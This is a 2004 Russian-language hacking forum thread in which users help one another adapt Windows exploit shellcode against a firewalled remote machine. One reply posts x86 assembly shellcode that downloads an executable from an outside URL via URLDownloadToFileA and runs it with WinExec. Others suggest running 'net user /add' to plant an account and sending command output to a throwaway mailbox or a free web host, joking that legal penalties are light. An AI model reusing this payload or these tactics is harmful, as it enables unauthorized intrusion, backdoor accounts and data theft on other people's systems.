Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | | |
Не знаю как насчет малой. Но W32Dasm когда надо просто... 05.01.04 23:07 Число просмотров: 2539
Автор: Killer{R} <Dmitry> Статус: Elderman
|
Не знаю как насчет малой. Но W32Dasm когда надо просто глянуть дизасм проги у которой нет никаких вы?бонов против дизасма - имхо самое то. Занимает он у меня 1.4мб
|
<hacking>
|
Выполнение команд без открытия шелла 04.01.04 15:21
Автор: SpAuT Статус: Незарегистрированный пользователь
|
Дайте инфу или подскажите каким образом надо модифицировать код эксплоита который даёт шелл, таким образом чтоб он выполнил несколько команд баз открытия порта!
|
|
Есть проги которые помогают создать шеллкод? 05.01.04 18:12
Автор: SpAuT Статус: Незарегистрированный пользователь
|
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Есть проги которые помогают создать шеллкод?
|
| |
Ага 05.01.04 21:12
Автор: amirul <Serge> Статус: The Elderman
|
> Есть проги которые помогают создать шеллкод? Называются компиляторы. Можешь воспользоваться ассемблером, а можешь и чем нибудь вроде C.
|
|
Надо написать прогу на си (или можно на си++) , компилить... 05.01.04 17:39
Автор: SpAuT Статус: Незарегистрированный пользователь
|
Надо написать прогу на си (или можно на си++) , компилить тока под виндами ( если это переделать
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "/bin/sh";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
на это
#include <stdio.h>
main()
{
char *shell[2];
shell[0] = "c:\windows\system32\cmd.exe";
shell[1] = NULL;
execve(shell[0], shell, NULL);
}
Какой самый маленький дизассемблер ( по размеру файла)?
|
| |
ну ты даешь... 06.01.04 05:09
Автор: DgtlScrm Статус: Member Отредактировано 06.01.04 05:12 Количество правок: 1
|
на переносимость я так полагаю ты не рассчитываешь? Как знаешь... но тогда лудше всеравно пиши на асме:
xor ebx, ebx;
add dh, 0xff;
// app name: http://www.ietest1.by.ru/fooware.exe
mov dword ptr[edx-0x28],0x70747468;// save "http"
mov dword ptr[edx-0x24],0x772f2f3a; // save "://w"
mov dword ptr[edx-0x20],0x692e7777;// save "ww.i"
mov dword ptr[edx-0x1c],0x73657465;// save "etes"
mov dword ptr[edx-0x18],0x622e3174;// save "t1.b"
mov dword ptr[edx-0x14],0x75722e79;// save "y.ru"
mov dword ptr[edx-0x10],0x6f6f662f; // save "/foo"
mov dword ptr[edx-0x0c],0x65726177;// save "ware"
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea eax, [edx-0x28];
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
pop ebx; //set ebx to URLDownloadToFileA entry point
push edx
xor edx,edxset edx to zero
push edx
push edx
push ecx
push eax
push edx
call ebx
pop edx; // restore str addr
// Execute downloaded file:
pop eax; // get WinExec address
xor ebx,ebx
add dh, 0xff
mov dword ptr[edx-0x0c],0x785c3a63;// save "c:\X" (file to download)
mov dword ptr[edx-0x08],0x6578652e;// save ".exe"
mov dword ptr[edx-0x04],ebx;// fill with \x00 on the end
lea ecx, [edx-0x0c];// move ecx addr of string (file name)
push 0x01
push ecx
call eax
---
А адреса URLDownloadToFile и WinExec ищи как хочешь, уже не маленький :)
(извеняюсь за такой некрасивый код, просто я его выдрал с одного из своих первых спроитов %) )
А ты хотел в килобайтах? Нормальный сплоит поменьше сотни байт это однозначно :)
Этот пример закачивает и запускает. Кстати нащет дизассемблера - это был прикол такой??? Если нет, то сначала немного почитай... (не прийми это как обиду, это просто совет... я когда-тоже такой был :) а наверное таким и остался :) )
|
| | |
неплохая имхо инфа по написанию шеллкодов 06.01.04 11:05
Автор: vladik_ Статус: Незарегистрированный пользователь Отредактировано 06.01.04 11:05 Количество правок: 1
|
инфа
|
| |
Дизассемблер-то тебе зачем??? 05.01.04 17:51
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
Может тебе все-таки компилятор C нужен?
|
| | |
Нет, но его тоже надо -)Какой самый малой? 05.01.04 18:08
Автор: SpAuT Статус: Незарегистрированный пользователь
|
> Может тебе все-таки компилятор C нужен? Нет, но его тоже надо -)Какой самый малой?
|
| | | |
Не знаю как насчет малой. Но W32Dasm когда надо просто... 05.01.04 23:07
Автор: Killer{R} <Dmitry> Статус: Elderman
|
Не знаю как насчет малой. Но W32Dasm когда надо просто глянуть дизасм проги у которой нет никаких вы?бонов против дизасма - имхо самое то. Занимает он у меня 1.4мб
|
|
Чё та на neworder.box.sk не нашел код! -( Может кто мне его... 05.01.04 14:35
Автор: SpAuT Статус: Незарегистрированный пользователь
|
Чё та на neworder.box.sk не нашел код! -( Может кто мне его сгенерирует??!!!!
|
|
Надо найти шелл-код, который выполнит данныу операцию. Поищи... 04.01.04 22:06
Автор: Ilich Статус: Незарегистрированный пользователь
|
Надо найти шелл-код, который выполнит данныу операцию. Поищи на neworder.box.sk
|
|
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит... 04.01.04 21:26
Автор: SpAuT Статус: Незарегистрированный пользователь
|
Короче на машине стоит файрволл (win2k) и надо чтоб сплоит создал пользавотеля с правами админа!Не открывая шелл!
|
| |
Ты уверен, что это именно то что тебе надо? 05.01.04 09:32
Автор: DgtlScrm Статус: Member
|
> Короче на машине стоит файрволл (win2k) и надо чтоб сплоит > создал пользавотеля с правами админа!Не открывая шелл!
почитай MSDN о том как создать пользователя. Я так понимаю ты работаешь с переносимым шеллкодом??? Вот и найди все необходимые функции, которые тебе понадобятся, вычили шеллкодом их адреса и исполняй. Только если машина удаленная и вдобавок фаервол, то созданный пользователь тебе не пригодится. Лудше организуй систему исполнения комманд, а результаты работы высылай на левое мыло... или если даже SMTP заблокирован, то создай на H1.RU сайтец и через веб сабмить все данные туда.
Но закон не дремлет :) Хотя и ответственность у нас не такая уж и высокая :)
|
| | |
Дополнение 05.01.04 11:21
Автор: amirul <Serge> Статус: The Elderman
|
> почитай MSDN о том как создать пользователя. Я так понимаю > ты работаешь с переносимым шеллкодом??? Вот и найди все > необходимые функции, которые тебе понадобятся, вычили > шеллкодом их адреса и исполняй. Только если машина Можно даже и без этого обойтись. Просто вместо "cmd.exe" в самом конце сплойта запускать "net user /add"
> удаленная и вдобавок фаервол, то созданный пользователь > тебе не пригодится. Лудше организуй систему исполнения > комманд, а результаты работы высылай на левое мыло... или > если даже SMTP заблокирован, то создай на H1.RU сайтец и > через веб сабмить все данные туда. > > Но закон не дремлет :) Хотя и ответственность у нас не > такая уж и высокая :) Во всем остальном полностью согласен
|
| | | |
...
05.01.04 16:33
Автор: DgtlScrm Статус: Member
|
...
> Можно даже и без этого обойтись. Просто вместо "cmd.exe" в > самом конце сплойта запускать "net user /add"
да, пожалуй такое решение по проще :)
|
|
Насколько я понимаю в шелл-коде 04.01.04 19:09
Автор: amirul <Serge> Статус: The Elderman Отредактировано 04.01.04 19:09 Количество правок: 1
|
> Дайте инфу или подскажите каким образом надо модифицировать > код эксплоита который даёт шелл, таким образом чтоб он > выполнил несколько команд баз открытия порта! Обычно делается ShellExecute с "open"-ом для cmd.exe или CreateProcess с путем к файлу cmd.exe.
Причем до этого должны находиться всякие заморочки, которые инициализируют винсок, открывают сокет и перенаправляют ввод/вывод создаваемого процесса в этот сокет. Тебе просто надо поудалять эти вещи и поклонировать части с созданием процесса для других команд.
|
|
Можно чуть внятнее - что ты не хочешь открывать? :) 04.01.04 15:46
Автор: Ktirf <Æ Rusakov> Статус: Elderman
|
|
|
|